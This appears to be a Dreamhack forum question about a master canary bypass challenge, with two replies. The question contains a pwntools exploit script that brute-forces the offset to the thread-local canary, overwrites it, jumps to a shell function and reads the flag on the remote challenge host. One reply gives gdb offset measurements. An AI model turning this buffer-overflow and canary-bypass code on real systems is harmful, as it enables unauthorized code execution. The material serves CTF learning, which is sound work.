Question

The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script

`from pwn import *
context.log_level = 'debug'
for i in range(400, 9000, 8):
	p = remote("host3.dreamhack.games", 17226)

	elf = ELF('./mc_thread')


	payload = b'A' * 264

	payload += b'A' * 8 # canary

	payload += b'B' * 8

	payload += p64(elf.symbols['giveshell'])

	payload += b'C' * (i - len(payload))

	payload += p64(0x404800 - 0x972)

	payload += b'C' * (0x10)

	payload += p64(0x4141414141414141)

	inp_sz = len(payload) // 8

	p.sendlineafter(b'Size: ', str(inp_sz).encode())

	p.sendafter(b'Data: ', payload)
	p.sendline("cat flag")
	data = p.recvallS(timeout=3)
	if "DH{" in data:
		print(data)
		break`

Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance

#system_hacking #master_canary #mc_thread

Answer 1

as you know, offset can be changed according to the environment. so bf is necessary i think.

2023.09.21. 21:42

Answer 2

If run on the dockerfile the distance is kinda large, but the steps are also the ones shown in the exploit tech page...

(gdb) x/x $rbp-0x110
0x7ffff7d8bd40:	0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668:	0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928

2023.09.21. 22:07